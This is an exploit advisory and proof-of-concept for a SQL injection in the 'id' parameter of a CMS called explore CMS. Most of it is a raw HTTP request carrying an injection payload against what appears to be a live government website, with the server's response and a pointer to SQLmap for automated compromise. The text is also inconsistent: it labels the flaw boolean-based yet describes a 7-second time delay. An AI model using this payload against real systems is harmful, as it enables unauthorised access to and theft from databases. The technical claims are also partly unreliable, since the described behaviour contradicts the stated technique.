# Exploit Title: explore CMS - Boolean Based SQL Injection # Date: 19/03/2022 # Exploit Author: Sajibe Kanti # Vendor Name : EXPLORE IT # Vendor Homepage: https://exploreit.com.bd # CVE: On Request # POC #SQL Injection SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page. #Steps to reproduce Following URL is vulnerable to SQL Injection in the 'id' field. GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1 Host: www.gdc.gov.bd Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320 Referer: https://www.gdc.gov.bd/ User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 HTTP/1.1 200 OK content-encoding: server: LiteSpeed Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html; charset=UTF-8 transfer-encoding: chunked date: Thu, 17 Mar 2022 07:27:21 GMT vary: Accept-Encoding 10.3.34-MariaDB Server accepts the payload and the response get delayed by 7 seconds. #Impact An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap. -- Thanks Sajibe Kanti